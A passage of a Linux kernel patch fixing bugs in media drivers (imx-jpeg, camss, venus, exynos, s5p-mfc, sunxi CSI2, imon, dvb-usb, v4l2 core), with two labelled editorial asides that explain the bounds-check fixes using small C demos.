++	if (!list_empty(&dev->msg_queue_core_ctx.ready_queue)) {
+ 		mtk_v4l2_debug(3, "re-schedule to decode for core: %d",
+ 			       dev->msg_queue_core_ctx.ready_num);
+ 		queue_work(dev->core_workqueue, &msg_queue->core_work);
+diff --git a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg-hw.c b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg-hw.c
+index 9418fcf740a82..ef28122a5ed49 100644
+--- a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg-hw.c
++++ b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg-hw.c
+@@ -76,12 +76,14 @@ void print_wrapper_info(struct device *dev, void __iomem *reg)
+ 
+ void mxc_jpeg_enable_irq(void __iomem *reg, int slot)
+ {
+-	writel(0xFFFFFFFF, reg + MXC_SLOT_OFFSET(slot, SLOT_IRQ_EN));
++	writel(0xFFFFFFFF, reg + MXC_SLOT_OFFSET(slot, SLOT_STATUS));
++	writel(0xF0C, reg + MXC_SLOT_OFFSET(slot, SLOT_IRQ_EN));
+ }
+ 
+ void mxc_jpeg_disable_irq(void __iomem *reg, int slot)
+ {
+ 	writel(0x0, reg + MXC_SLOT_OFFSET(slot, SLOT_IRQ_EN));
++	writel(0xFFFFFFFF, reg + MXC_SLOT_OFFSET(slot, SLOT_STATUS));
+ }
+ 
+ void mxc_jpeg_sw_reset(void __iomem *reg)
+diff --git a/drivers/media/platform/qcom/camss/camss-video.c b/drivers/media/platform/qcom/camss/camss-video.c
+index 81fb3a5bc1d51..41deda232e4a1 100644
+--- a/drivers/media/platform/qcom/camss/camss-video.c
++++ b/drivers/media/platform/qcom/camss/camss-video.c
+@@ -495,7 +495,7 @@ static int video_start_streaming(struct vb2_queue *q, unsigned int count)
+ 
+ 	ret = video_device_pipeline_start(vdev, &video->pipe);
+ 	if (ret < 0)
+-		return ret;
++		goto flush_buffers;
+ 
+ 	ret = video_check_format(video);
+ 	if (ret < 0)
+@@ -524,6 +524,7 @@ static int video_start_streaming(struct vb2_queue *q, unsigned int count)
+ error:
+ 	video_device_pipeline_stop(vdev);
+ 
++flush_buffers:
+ 	video->ops->flush_buffers(video, VB2_BUF_STATE_QUEUED);
+ 
+ 	return ret;
+diff --git a/drivers/media/platform/qcom/camss/camss.c b/drivers/media/platform/qcom/camss/camss.c
+index 1118c40886d52..a157cac72e0ab 100644
+--- a/drivers/media/platform/qcom/camss/camss.c
++++ b/drivers/media/platform/qcom/camss/camss.c
+@@ -1465,6 +1465,14 @@ static int camss_configure_pd(struct camss *camss)
+ 		return camss->genpd_num;
+ 	}
+ 
++	/*
++	 * If a platform device has just one power domain, it is attached at
++	 * the platform_probe() level, so there is no need (and no way) to
++	 * attach it again; this is the case for CAMSS on MSM8916.
++	 */
++	if (camss->genpd_num == 1)
++		return 0;
++
+ 	camss->genpd = devm_kmalloc_array(dev, camss->genpd_num,
+ 					  sizeof(*camss->genpd), GFP_KERNEL);
+ 	if (!camss->genpd)
+@@ -1698,6 +1706,9 @@ void camss_delete(struct camss *camss)
+ 
+ 	pm_runtime_disable(camss->dev);
+ 
++	if (camss->genpd_num == 1)
++		return;
++
+ 	for (i = 0; i < camss->genpd_num; i++) {
+ 		device_link_del(camss->genpd_link[i]);
+ 		dev_pm_domain_detach(camss->genpd[i], true);
+diff --git a/drivers/media/platform/qcom/venus/pm_helpers.c b/drivers/media/platform/qcom/venus/pm_helpers.c
+index c93d2906e4c7d..48c9084bb4dba 100644
+--- a/drivers/media/platform/qcom/venus/pm_helpers.c
++++ b/drivers/media/platform/qcom/venus/pm_helpers.c
+@@ -869,8 +869,8 @@ static int vcodec_domains_get(struct venus_core *core)
+ 	for (i = 0; i < res->vcodec_pmdomains_num; i++) {
+ 		pd = dev_pm_domain_attach_by_name(dev,
+ 						  res->vcodec_pmdomains[i]);
+-		if (IS_ERR(pd))
+-			return PTR_ERR(pd);
++		if (IS_ERR_OR_NULL(pd))
++			return PTR_ERR(pd) ? : -ENODATA;
+ 		core->pmdomains[i] = pd;
+ 	}
+ 
+diff --git a/drivers/media/platform/samsung/exynos4-is/fimc-core.c b/drivers/media/platform/samsung/exynos4-is/fimc-core.c
+index 91cc8d58a663b..1791100b69353 100644
+--- a/drivers/media/platform/samsung/exynos4-is/fimc-core.c
++++ b/drivers/media/platform/samsung/exynos4-is/fimc-core.c
+@@ -1173,7 +1173,7 @@ int __init fimc_register_driver(void)
+ 	return platform_driver_register(&fimc_driver);
+ }
+ 
+-void __exit fimc_unregister_driver(void)
++void fimc_unregister_driver(void)
+ {
+ 	platform_driver_unregister(&fimc_driver);
+ }
+diff --git a/drivers/media/platform/samsung/exynos4-is/media-dev.c b/drivers/media/platform/samsung/exynos4-is/media-dev.c
+index 52b43ea040302..2f3071acb9c97 100644
+--- a/drivers/media/platform/samsung/exynos4-is/media-dev.c
++++ b/drivers/media/platform/samsung/exynos4-is/media-dev.c
+@@ -1380,9 +1380,7 @@ static int subdev_notifier_bound(struct v4l2_async_notifier *notifier,
+ 
+ 	/* Find platform data for this sensor subdev */
+ 	for (i = 0; i < ARRAY_SIZE(fmd->sensor); i++)
+-		if (fmd->sensor[i].asd &&
+-		    fmd->sensor[i].asd->match.fwnode ==
+-		    of_fwnode_handle(subdev->dev->of_node))
++		if (fmd->sensor[i].asd == asd)
+ 			si = &fmd->sensor[i];
+ 
+ 	if (si == NULL)
+@@ -1474,7 +1472,7 @@ static int fimc_md_probe(struct platform_device *pdev)
+ 	pinctrl = devm_pinctrl_get(dev);
+ 	if (IS_ERR(pinctrl)) {
+ 		ret = PTR_ERR(pinctrl);
+-		if (ret != EPROBE_DEFER)
++		if (ret != -EPROBE_DEFER)
+ 			dev_err(dev, "Failed to get pinctrl: %d\n", ret);
+ 		goto err_clk;
+ 	}
+@@ -1586,7 +1584,11 @@ static int __init fimc_md_init(void)
+ 	if (ret)
+ 		return ret;
+ 
+-	return platform_driver_register(&fimc_md_driver);
++	ret = platform_driver_register(&fimc_md_driver);
++	if (ret)
++		fimc_unregister_driver();
++
++	return ret;
+ }
+ 
+ static void __exit fimc_md_exit(void)
+diff --git a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc.c b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc.c
+index fca5c6405eec3..007c7dbee0377 100644
+--- a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc.c
++++ b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc.c
+@@ -1576,8 +1576,18 @@ static struct s5p_mfc_variant mfc_drvdata_v7 = {
+ 	.port_num	= MFC_NUM_PORTS_V7,
+ 	.buf_size	= &buf_size_v7,
+ 	.fw_name[0]     = "s5p-mfc-v7.fw",
+-	.clk_names	= {"mfc", "sclk_mfc"},
+-	.num_clocks	= 2,
++	.clk_names	= {"mfc"},
++	.num_clocks	= 1,
++};
++
++static struct s5p_mfc_variant mfc_drvdata_v7_3250 = {
++	.version        = MFC_VERSION_V7,
++	.version_bit    = MFC_V7_BIT,
++	.port_num       = MFC_NUM_PORTS_V7,
++	.buf_size       = &buf_size_v7,
++	.fw_name[0]     = "s5p-mfc-v7.fw",
++	.clk_names      = {"mfc", "sclk_mfc"},
++	.num_clocks     = 2,
+ };
+ 
+ static struct s5p_mfc_buf_size_v6 mfc_buf_size_v8 = {
+@@ -1647,6 +1657,9 @@ static const struct of_device_id exynos_mfc_match[] = {
+ 	}, {
+ 		.compatible = "samsung,mfc-v7",
+ 		.data = &mfc_drvdata_v7,
++	}, {
++		.compatible = "samsung,exynos3250-mfc",
++		.data = &mfc_drvdata_v7_3250,
+ 	}, {
+ 		.compatible = "samsung,mfc-v8",
+ 		.data = &mfc_drvdata_v8,
+diff --git a/drivers/media/platform/st/sti/c8sectpfe/c8sectpfe-core.c b/drivers/media/platform/st/sti/c8sectpfe/c8sectpfe-core.c
+index cefe6b7bfdc4e..1dbb89f0ddb8c 100644
+--- a/drivers/media/platform/st/sti/c8sectpfe/c8sectpfe-core.c
++++ b/drivers/media/platform/st/sti/c8sectpfe/c8sectpfe-core.c
+@@ -925,6 +925,7 @@ static int configure_channels(struct c8sectpfei *fei)
+ 		if (ret) {
+ 			dev_err(fei->dev,
+ 				"configure_memdma_and_inputblock failed\n");
++			of_node_put(child);
+ 			goto err_unmap;
+ 		}
+ 		index++;
+diff --git a/drivers/media/platform/sunxi/sun6i-mipi-csi2/sun6i_mipi_csi2.c b/drivers/media/platform/sunxi/sun6i-mipi-csi2/sun6i_mipi_csi2.c
+index 30d6c0c5161f4..484ac5f054d53 100644
+--- a/drivers/media/platform/sunxi/sun6i-mipi-csi2/sun6i_mipi_csi2.c
++++ b/drivers/media/platform/sunxi/sun6i-mipi-csi2/sun6i_mipi_csi2.c
+@@ -498,6 +498,7 @@ static int sun6i_mipi_csi2_bridge_setup(struct sun6i_mipi_csi2_device *csi2_dev)
+ 	struct v4l2_async_notifier *notifier = &bridge->notifier;
+ 	struct media_pad *pads = bridge->pads;
+ 	struct device *dev = csi2_dev->dev;
++	bool notifier_registered = false;
+ 	int ret;
+ 
+ 	mutex_init(&bridge->lock);
+@@ -519,8 +520,10 @@ static int sun6i_mipi_csi2_bridge_setup(struct sun6i_mipi_csi2_device *csi2_dev)
+ 
+ 	/* Media Pads */
+ 
+-	pads[SUN6I_MIPI_CSI2_PAD_SINK].flags = MEDIA_PAD_FL_SINK;
+-	pads[SUN6I_MIPI_CSI2_PAD_SOURCE].flags = MEDIA_PAD_FL_SOURCE;
++	pads[SUN6I_MIPI_CSI2_PAD_SINK].flags = MEDIA_PAD_FL_SINK |
++					       MEDIA_PAD_FL_MUST_CONNECT;
++	pads[SUN6I_MIPI_CSI2_PAD_SOURCE].flags = MEDIA_PAD_FL_SOURCE |
++						 MEDIA_PAD_FL_MUST_CONNECT;
+ 
+ 	ret = media_entity_pads_init(&subdev->entity, SUN6I_MIPI_CSI2_PAD_COUNT,
+ 				     pads);
+@@ -533,12 +536,17 @@ static int sun6i_mipi_csi2_bridge_setup(struct sun6i_mipi_csi2_device *csi2_dev)
+ 	notifier->ops = &sun6i_mipi_csi2_notifier_ops;
+ 
+ 	ret = sun6i_mipi_csi2_bridge_source_setup(csi2_dev);
+-	if (ret)
++	if (ret && ret != -ENODEV)
+ 		goto error_v4l2_notifier_cleanup;
+ 
+-	ret = v4l2_async_subdev_nf_register(subdev, notifier);
+-	if (ret < 0)
+-		goto error_v4l2_notifier_cleanup;
++	/* Only register the notifier when a sensor is connected. */
++	if (ret != -ENODEV) {
++		ret = v4l2_async_subdev_nf_register(subdev, notifier);
++		if (ret < 0)
++			goto error_v4l2_notifier_cleanup;
++
++		notifier_registered = true;
++	}
+ 
+ 	/* V4L2 Subdev */
+ 
+@@ -549,7 +557,8 @@ static int sun6i_mipi_csi2_bridge_setup(struct sun6i_mipi_csi2_device *csi2_dev)
+ 	return 0;
+ 
+ error_v4l2_notifier_unregister:
+-	v4l2_async_nf_unregister(notifier);
++	if (notifier_registered)
++		v4l2_async_nf_unregister(notifier);
+ 
+ error_v4l2_notifier_cleanup:
+ 	v4l2_async_nf_cleanup(notifier);
+diff --git a/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/sun8i_a83t_mipi_csi2.c b/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/sun8i_a83t_mipi_csi2.c
+index b032ec13a683a..d993c09a48202 100644
+--- a/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/sun8i_a83t_mipi_csi2.c
++++ b/drivers/media/platform/sunxi/sun8i-a83t-mipi-csi2/sun8i_a83t_mipi_csi2.c
+@@ -536,6 +536,7 @@ sun8i_a83t_mipi_csi2_bridge_setup(struct sun8i_a83t_mipi_csi2_device *csi2_dev)
+ 	struct v4l2_async_notifier *notifier = &bridge->notifier;
+ 	struct media_pad *pads = bridge->pads;
+ 	struct device *dev = csi2_dev->dev;
++	bool notifier_registered = false;
+ 	int ret;
+ 
+ 	mutex_init(&bridge->lock);
+@@ -557,8 +558,10 @@ sun8i_a83t_mipi_csi2_bridge_setup(struct sun8i_a83t_mipi_csi2_device *csi2_dev)
+ 
+ 	/* Media Pads */
+ 
+-	pads[SUN8I_A83T_MIPI_CSI2_PAD_SINK].flags = MEDIA_PAD_FL_SINK;
+-	pads[SUN8I_A83T_MIPI_CSI2_PAD_SOURCE].flags = MEDIA_PAD_FL_SOURCE;
++	pads[SUN8I_A83T_MIPI_CSI2_PAD_SINK].flags = MEDIA_PAD_FL_SINK |
++						    MEDIA_PAD_FL_MUST_CONNECT;
++	pads[SUN8I_A83T_MIPI_CSI2_PAD_SOURCE].flags = MEDIA_PAD_FL_SOURCE |
++						      MEDIA_PAD_FL_MUST_CONNECT;
+ 
+ 	ret = media_entity_pads_init(&subdev->entity,
+ 				     SUN8I_A83T_MIPI_CSI2_PAD_COUNT, pads);
+@@ -571,12 +574,17 @@ sun8i_a83t_mipi_csi2_bridge_setup(struct sun8i_a83t_mipi_csi2_device *csi2_dev)
+ 	notifier->ops = &sun8i_a83t_mipi_csi2_notifier_ops;
+ 
+ 	ret = sun8i_a83t_mipi_csi2_bridge_source_setup(csi2_dev);
+-	if (ret)
++	if (ret && ret != -ENODEV)
+ 		goto error_v4l2_notifier_cleanup;
+ 
+-	ret = v4l2_async_subdev_nf_register(subdev, notifier);
+-	if (ret < 0)
+-		goto error_v4l2_notifier_cleanup;
++	/* Only register the notifier when a sensor is connected. */
++	if (ret != -ENODEV) {
++		ret = v4l2_async_subdev_nf_register(subdev, notifier);
++		if (ret < 0)
++			goto error_v4l2_notifier_cleanup;
++
++		notifier_registered = true;
++	}
+ 
+ 	/* V4L2 Subdev */
+ 
+@@ -587,7 +595,8 @@ sun8i_a83t_mipi_csi2_bridge_setup(struct sun8i_a83t_mipi_csi2_device *csi2_dev)
+ 	return 0;
+ 
+ error_v4l2_notifier_unregister:
+-	v4l2_async_nf_unregister(notifier);
++	if (notifier_registered)
++		v4l2_async_nf_unregister(notifier);
+ 
+ error_v4l2_notifier_cleanup:
+ 	v4l2_async_nf_cleanup(notifier);
+diff --git a/drivers/media/radio/si470x/radio-si470x-usb.c b/drivers/media/radio/si470x/radio-si470x-usb.c
+index 6b2768623c883..aa7a580dbecc0 100644
+--- a/drivers/media/radio/si470x/radio-si470x-usb.c
++++ b/drivers/media/radio/si470x/radio-si470x-usb.c
+@@ -727,8 +727,10 @@ static int si470x_usb_driver_probe(struct usb_interface *intf,
+ 
+ 	/* start radio */
+ 	retval = si470x_start_usb(radio);
+-	if (retval < 0)
++	if (retval < 0 && !radio->int_in_running)
+ 		goto err_buf;
++	else if (retval < 0)	/* in case of radio->int_in_running == 1 */
++		goto err_all;
+ 
+ 	/* set initial frequency */
+ 	si470x_set_freq(radio, 87.5 * FREQ_MUL); /* available in all regions */
+diff --git a/drivers/media/rc/imon.c b/drivers/media/rc/imon.c
+index 5edfd8a9e8494..74546f7e34691 100644
+--- a/drivers/media/rc/imon.c
++++ b/drivers/media/rc/imon.c
+@@ -646,15 +646,14 @@ static int send_packet(struct imon_context *ictx)
+ 		pr_err_ratelimited("error submitting urb(%d)\n", retval);
+ 	} else {
+ 		/* Wait for transmission to complete (or abort) */
+-		mutex_unlock(&ictx->lock);
+ 		retval = wait_for_completion_interruptible(
+ 				&ictx->tx.finished);
+ 		if (retval) {
+ 			usb_kill_urb(ictx->tx_urb);
+ 			pr_err_ratelimited("task interrupted\n");
+ 		}
+-		mutex_lock(&ictx->lock);
+ 
++		ictx->tx.busy = false;
+ 		retval = ictx->tx.status;
+ 		if (retval)
+ 			pr_err_ratelimited("packet tx failed (%d)\n", retval);
+@@ -953,7 +952,8 @@ static ssize_t vfd_write(struct file *file, const char __user *buf,
+ 	if (ictx->disconnected)
+ 		return -ENODEV;
+ 
+-	mutex_lock(&ictx->lock);
++	if (mutex_lock_interruptible(&ictx->lock))
++		return -ERESTARTSYS;
+ 
+ 	if (!ictx->dev_present_intf0) {
+ 		pr_err_ratelimited("no iMON device present\n");
+diff --git a/drivers/media/test-drivers/vidtv/vidtv_bridge.c b/drivers/media/test-drivers/vidtv/vidtv_bridge.c
+index 82620613d56b8..dff7265a42ca2 100644
+--- a/drivers/media/test-drivers/vidtv/vidtv_bridge.c
++++ b/drivers/media/test-drivers/vidtv/vidtv_bridge.c
+@@ -459,26 +459,20 @@ fail_dmx_conn:
+ 	for (j = j - 1; j >= 0; --j)
+ 		dvb->demux.dmx.remove_frontend(&dvb->demux.dmx,
+ 					       &dvb->dmx_fe[j]);
+-fail_dmx_dev:
+ 	dvb_dmxdev_release(&dvb->dmx_dev);
+-fail_dmx:
++fail_dmx_dev:
+ 	dvb_dmx_release(&dvb->demux);
++fail_dmx:
++fail_demod_probe:
++	for (i = i - 1; i >= 0; --i) {
++		dvb_unregister_frontend(dvb->fe[i]);
+ fail_fe:
+-	for (j = i; j >= 0; --j)
+-		dvb_unregister_frontend(dvb->fe[j]);
++		dvb_module_release(dvb->i2c_client_tuner[i]);
+ fail_tuner_probe:
+-	for (j = i; j >= 0; --j)
+-		if (dvb->i2c_client_tuner[j])
+-			dvb_module_release(dvb->i2c_client_tuner[j]);
+-
+-fail_demod_probe:
+-	for (j = i; j >= 0; --j)
+-		if (dvb->i2c_client_demod[j])
+-			dvb_module_release(dvb->i2c_client_demod[j]);
+-
++		dvb_module_release(dvb->i2c_client_demod[i]);
++	}
+ fail_adapter:
+ 	dvb_unregister_adapter(&dvb->adapter);
+-
+ fail_i2c:
+ 	i2c_del_adapter(&dvb->i2c_adapter);
+ 
+diff --git a/drivers/media/test-drivers/vimc/vimc-core.c b/drivers/media/test-drivers/vimc/vimc-core.c
+index 2ae7a0f11ebfc..e82cfa5ffbf47 100644
+--- a/drivers/media/test-drivers/vimc/vimc-core.c
++++ b/drivers/media/test-drivers/vimc/vimc-core.c
+@@ -433,7 +433,7 @@ static int __init vimc_init(void)
+ 	if (ret) {
+ 		dev_err(&vimc_pdev.dev,
+ 			"platform driver registration failed (err=%d)\n", ret);
+-		platform_driver_unregister(&vimc_pdrv);
++		platform_device_unregister(&vimc_pdev);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/media/test-drivers/vivid/vivid-vid-cap.c b/drivers/media/test-drivers/vivid/vivid-vid-cap.c
+index 11620eaf941e3..c0999581c599b 100644
+--- a/drivers/media/test-drivers/vivid/vivid-vid-cap.c
++++ b/drivers/media/test-drivers/vivid/vivid-vid-cap.c
+@@ -973,6 +973,7 @@ int vivid_vid_cap_s_selection(struct file *file, void *fh, struct v4l2_selection
+ 			if (dev->has_compose_cap) {
+ 				v4l2_rect_set_min_size(compose, &min_rect);
+ 				v4l2_rect_set_max_size(compose, &max_rect);
++				v4l2_rect_map_inside(compose, &fmt);
+ 			}
+ 			dev->fmt_cap_rect = fmt;
+ 			tpg_s_buf_height(&dev->tpg, fmt.height);
+diff --git a/drivers/media/usb/dvb-usb/az6027.c b/drivers/media/usb/dvb-usb/az6027.c
+index cf15988dfb510..7d78ee09be5e1 100644
+--- a/drivers/media/usb/dvb-usb/az6027.c
++++ b/drivers/media/usb/dvb-usb/az6027.c
+@@ -975,6 +975,10 @@ static int az6027_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[], int n
+ 		if (msg[i].addr == 0x99) {
+ 			req = 0xBE;
+ 			index = 0;
++			if (msg[i].len < 1) {
++				i = -EOPNOTSUPP;
++				break;
++			}
+ 			value = msg[i].buf[0] & 0x00ff;
+ 			length = 1;
+ 			az6027_usb_out_op(d, req, value, index, data, length);
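
[Editorial aside, not part of the patch] The az6027 change guards msg[i].buf[0] with a length check before dereferencing, since a zero-length I2C message would otherwise be read out of bounds. A minimal sketch of the validate-before-index rule, with simplified types:

/* Validate a message's length before touching its payload; sketch only. */
#include <stdio.h>

struct demo_msg {
	const unsigned char *buf;
	int len;
};

static int read_first_byte(const struct demo_msg *msg, unsigned int *value)
{
	if (msg->len < 1)	/* an empty message has no buf[0] to read */
		return -1;
	*value = msg->buf[0] & 0x00ff;
	return 0;
}

int main(void)
{
	unsigned char payload[] = { 0x42 };
	struct demo_msg ok = { payload, 1 };
	struct demo_msg empty = { payload, 0 };
	unsigned int v = 0;
	int rc;

	rc = read_first_byte(&ok, &v);
	printf("ok: %d (v=0x%02x)\n", rc, v);
	printf("empty: %d\n", read_first_byte(&empty, &v));
	return 0;
}
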
+diff --git a/drivers/media/usb/dvb-usb/dvb-usb-init.c b/drivers/media/usb/dvb-usb/dvb-usb-init.c
+index 61439c8f33cab..58eea8ab54779 100644
+--- a/drivers/media/usb/dvb-usb/dvb-usb-init.c
++++ b/drivers/media/usb/dvb-usb/dvb-usb-init.c
+@@ -81,7 +81,7 @@ static int dvb_usb_adapter_init(struct dvb_usb_device *d, short *adapter_nrs)
+ 
+ 		ret = dvb_usb_adapter_stream_init(adap);
+ 		if (ret)
+-			return ret;
++			goto stream_init_err;
+ 
+ 		ret = dvb_usb_adapter_dvb_init(adap, adapter_nrs);
+ 		if (ret)
+@@ -114,6 +114,8 @@ frontend_init_err:
+ 	dvb_usb_adapter_dvb_exit(adap);
+ dvb_init_err:
+ 	dvb_usb_adapter_stream_exit(adap);
++stream_init_err:
++	kfree(adap->priv);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/media/v4l2-core/v4l2-ctrls-api.c b/drivers/media/v4l2-core/v4l2-ctrls-api.c
+index d0a3aa3806fbd..3d3b6dc24ca63 100644
+--- a/drivers/media/v4l2-core/v4l2-ctrls-api.c
++++ b/drivers/media/v4l2-core/v4l2-ctrls-api.c
+@@ -150,6 +150,7 @@ static int user_to_new(struct v4l2_ext_control *c, struct v4l2_ctrl *ctrl)
+ 			 * then return an error.
+ 			 */
+ 			if (strlen(ctrl->p_new.p_char) == ctrl->maximum && last)
+ 				return -ERANGE;
+ 		}
++		ctrl->is_new = 1;
+ 		return ret;
+diff --git a/drivers/media/v4l2-core/v4l2-ctrls-core.c b/drivers/media/v4l2-core/v4l2-ctrls-core.c
+index 0dab1d7b90f0e..29169170880a6 100644
+--- a/drivers/media/v4l2-core/v4l2-ctrls-core.c
++++ b/drivers/media/v4l2-core/v4l2-ctrls-core.c
+@@ -1827,7 +1827,7 @@ struct v4l2_ctrl *v4l2_ctrl_new_std_menu(struct v4l2_ctrl_handler *hdl,
+ 	else if (type == V4L2_CTRL_TYPE_INTEGER_MENU)
+ 		qmenu_int = v4l2_ctrl_get_int_menu(id, &qmenu_int_len);
+ 
+-	if ((!qmenu && !qmenu_int) || (qmenu_int && max > qmenu_int_len)) {
++	if ((!qmenu && !qmenu_int) || (qmenu_int && max >= qmenu_int_len)) {
+ 		handler_set_err(hdl, -EINVAL);
+ 		return NULL;
+ 	}
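
[Editorial aside, not part of the patch] The v4l2-ctrls change tightens > to >=: max is an index into a menu with qmenu_int_len entries, so the last valid value is len - 1 and max == len must already be rejected. A tiny sketch of the corrected bound:

/* max is an index; len is a count: the last valid index is len - 1. */
#include <stdio.h>

static int menu_max_valid(unsigned int max, unsigned int len)
{
	return max < len;	/* i.e. reject max >= len, as the fix does */
}

int main(void)
{
	unsigned int len = 4;	/* menu with entries 0..3 */

	printf("max=3: %s\n", menu_max_valid(3, len) ? "ok" : "reject");
	printf("max=4: %s\n", menu_max_valid(4, len) ? "ok" : "reject");
	return 0;
}
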
+diff --git a/drivers/media/v4l2-core/v4l2-ioctl.c b/drivers/media/v4l2-core/v4l2-ioctl.c
+index fddba75d90745..6876ec25bc512 100644
+--- a/drivers/media/v4l2-core/v4l2-ioctl.c
++++ b/drivers/media/v4l2-core/v4l2-ioctl.c
+@@ -1347,23 +1347,23 @@ static void v4l_fill_fmtdesc(struct v4l2_fmtdesc *fmt)
+ 	case V4L2_PIX_FMT_YUV420:	descr = "Planar YUV 4:2:0"; break;
+ 	case V4L2_PIX_FMT_HI240:	descr = "8-bit Dithered RGB (BTTV)"; break;
+ 	case V4L2_PIX_FMT_M420:		descr = "YUV 4:2:0 (M420)"; break;
+-	case V4L2_PIX_FMT_NV12:		descr = "Y/CbCr 4:2:0"; break;
+-	case V4L2_PIX_FMT_NV21:		descr = "Y/CrCb 4:2:0"; break;
+-	case V4L2_PIX_FMT_NV16:		descr = "Y/CbCr 4:2:2"; break;
+-	case V4L2_PIX_FMT_NV61:		descr = "Y/CrCb 4:2:2"; break;
+-	case V4L2_PIX_FMT_NV24:		descr = "Y/CbCr 4:4:4"; break;
+-	case V4L2_PIX_FMT_NV42:		descr = "Y/CrCb 4:4:4"; break;
+-	case V4L2_PIX_FMT_P010:		descr = "10-bit Y/CbCr 4:2:0"; break;
+-	case V4L2_PIX_FMT_NV12_4L4:	descr = "Y/CbCr 4:2:0 (4x4 Linear)"; break;
+-	case V4L2_PIX_FMT_NV12_16L16:	descr = "Y/CbCr 4:2:0 (16x16 Linear)"; break;
+-	case V4L2_PIX_FMT_NV12_32L32:   descr = "Y/CbCr 4:2:0 (32x32 Linear)"; break;
+-	case V4L2_PIX_FMT_P010_4L4:	descr = "10-bit Y/CbCr 4:2:0 (4x4 Linear)"; break;
+-	case V4L2_PIX_FMT_NV12M:	descr = "Y/CbCr 4:2:0 (N-C)"; break;
+-	case V4L2_PIX_FMT_NV21M:	descr = "Y/CrCb 4:2:0 (N-C)"; break;
+-	case V4L2_PIX_FMT_NV16M:	descr = "Y/CbCr 4:2:2 (N-C)"; break;
+-	case V4L2_PIX_FMT_NV61M:	descr = "Y/CrCb 4:2:2 (N-C)"; break;
+-	case V4L2_PIX_FMT_NV12MT:	descr = "Y/CbCr 4:2:0 (64x32 MB, N-C)"; break;
+-	case V4L2_PIX_FMT_NV12MT_16X16:	descr = "Y/CbCr 4:2:0 (16x16 MB, N-C)"; break;
++	case V4L2_PIX_FMT_NV12:		descr = "Y/UV 4:2:0"; break;
++	case V4L2_PIX_FMT_NV21:		descr = "Y/VU 4:2:0"; break;
++	case V4L2_PIX_FMT_NV16:		descr = "Y/UV 4:2:2"; break;
++	case V4L2_PIX_FMT_NV61:		descr = "Y/VU 4:2:2"; break;
++	case V4L2_PIX_FMT_NV24:		descr = "Y/UV 4:4:4"; break;
++	case V4L2_PIX_FMT_NV42:		descr = "Y/VU 4:4:4"; break;
++	case V4L2_PIX_FMT_P010:		descr = "10-bit Y/UV 4:2:0"; break;
++	case V4L2_PIX_FMT_NV12_4L4:	descr = "Y/UV 4:2:0 (4x4 Linear)"; break;
++	case V4L2_PIX_FMT_NV12_16L16:	descr = "Y/UV 4:2:0 (16x16 Linear)"; break;
++	case V4L2_PIX_FMT_NV12_32L32:   descr = "Y/UV 4:2:0 (32x32 Linear)"; break;
++	case V4L2_PIX_FMT_P010_4L4:	descr = "10-bit Y/UV 4:2:0 (4x4 Linear)"; break;
++	case V4L2_PIX_FMT_NV12M:	descr = "Y/UV 4:2:0 (N-C)"; break;
++	case V4L2_PIX_FMT_NV21M:	descr = "Y/VU 4:2:0 (N-C)"; break;
++	case V4L2_PIX_FMT_NV16M:	descr = "Y/UV 4:2:2 (N-C)"; break;
++	case V4L2_PIX_FMT_NV61M:	descr = "Y/VU 4:2:2 (N-C)"; break;
++	case V4L2_PIX_FMT_NV12MT:	descr = "Y/UV 4:2:0 (64x32 MB, N-C)"; break;
++	case V4L2_PIX_FMT_NV12MT_16X16:	descr = "Y/UV 4:2:0 (16x16 MB, N-C)"; break;
+ 	case V4L2_PIX_FMT_YUV420M:	descr = "Planar YUV 4:2:0 (N-C)"; break;
+ 	case V4L2_PIX_FMT_YVU420M:	descr = "Planar YVU 4:2:0 (N-C)"; break;
+ 	case V4L2_PIX_FMT_YUV422M:	descr = "Planar YUV 4:2:2 (N-C)"; break;
+diff --git a/drivers/media/v4l2-core/videobuf-dma-contig.c b/drivers/media/v4l2-core/videobuf-dma-contig.c
+index 52312ce2ba056..f2c4393595574 100644
+--- a/drivers/media/v4l2-core/videobuf-dma-contig.c
++++ b/drivers/media/v4l2-core/videobuf-dma-contig.c
+@@ -36,12 +36,11 @@ struct videobuf_dma_contig_memory {
+ 
+ static int __videobuf_dc_alloc(struct device *dev,
+ 			       struct videobuf_dma_contig_memory *mem,
+-			       unsigned long size, gfp_t flags)
++			       unsigned long size)
+ {
+ 	mem->size = size;
+-	mem->vaddr = dma_alloc_coherent(dev, mem->size,
+-					&mem->dma_handle, flags);
+-
++	mem->vaddr = dma_alloc_coherent(dev, mem->size, &mem->dma_handle,
++					GFP_KERNEL);
+ 	if (!mem->vaddr) {
+ 		dev_err(dev, "memory alloc size %ld failed\n", mem->size);
+ 		return -ENOMEM;
+@@ -258,8 +257,7 @@ static int __videobuf_iolock(struct videobuf_queue *q,
+ 			return videobuf_dma_contig_user_get(mem, vb);
+ 
+ 		/* allocate memory for the read() method */
+-		if (__videobuf_dc_alloc(q->dev, mem, PAGE_ALIGN(vb->size),
+-					GFP_KERNEL))
++		if (__videobuf_dc_alloc(q->dev, mem, PAGE_ALIGN(vb->size)))
+ 			return -ENOMEM;
+ 		break;
+ 	case V4L2_MEMORY_OVERLAY:
+@@ -295,22 +293,18 @@ static int __videobuf_mmap_mapper(struct videobuf_queue *q,
+ 	BUG_ON(!mem);
+ 	MAGIC_CHECK(mem->magic, MAGIC_DC_MEM);
+ 
+-	if (__videobuf_dc_alloc(q->dev, mem, PAGE_ALIGN(buf->bsize),
+-				GFP_KERNEL | __GFP_COMP))
++	if (__videobuf_dc_alloc(q->dev, mem, PAGE_ALIGN(buf->bsize)))
+ 		goto error;
+ 
+-	/* Try to remap memory */
+-	vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
+-
+ 	/* the "vm_pgoff" is just used in v4l2 to find the
+ 	 * corresponding buffer data structure which is allocated
+ 	 * earlier and it does not mean the offset from the physical
+ 	 * buffer start address as usual. So set it to 0 to pass
+-	 * the sanity check in vm_iomap_memory().
